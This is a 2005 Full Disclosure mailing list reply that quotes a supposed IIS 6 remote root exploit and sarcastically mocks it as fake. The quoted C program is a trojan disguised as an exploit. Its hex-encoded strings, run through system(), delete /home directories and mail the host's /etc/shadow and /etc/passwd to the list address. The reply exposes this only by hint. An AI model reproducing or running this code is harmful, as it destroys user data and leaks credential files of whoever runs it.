Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: IIS 6 Remote Buffer Overflow Exploit

From: Pbt <info16 () ifrance com>
Date: Tue, 19 Apr 2005 02:08:12 +0200
Le lundi 18 avril 2005 à 16:53 -0700, Day Jay a écrit :

/* Proof of concept code
   Please don't send us e-mails
   asking us "how to hack" because
   we will be forced to skullfsck you.

DISCLAIMER:
!!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!

You're right to add this warning ! :)


  
   Remote root.

   eg.
   #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
    + Connecting to host...
    + Connected.
    + Inserting Shellcode...
    + Done...
    + Spawining shell..

    Microsoft Windows XP [Version 5.1.2600]
   (C) Copyright 1985-2001 Microsoft Corp.
   C:\>



*/
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";

char launcher [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

char netcat_shell [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

Strange sc... :)


main()
{

//Section Initialises designs implemented by mexicans
//Imigrate




system(launcher);
system(netcat_shell);
system(shellcode);

Very stealth, awesome !!



//int socket = 0;
//double long port = 0.0;

//#DEFINE port host address
//#DEFINE number of inters
//#DEFINE gull eeuEE

 //     for(int j; j < 30; j++)
        {
        //Find socket remote address fault
        printf(".");

Did you forget to add a printf("Waiting for your root shell...\n");
here, huh ?


        }
//overtake inetinfo here IIS_666666^
return 0;
}


OK Great work !
Don't forget to send us your tcp stack remote r00t h4x0r 0day
tomorrow :)

-- 
Pbt

Attachment: signature.asc
Description: This is a digitally signed message part

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: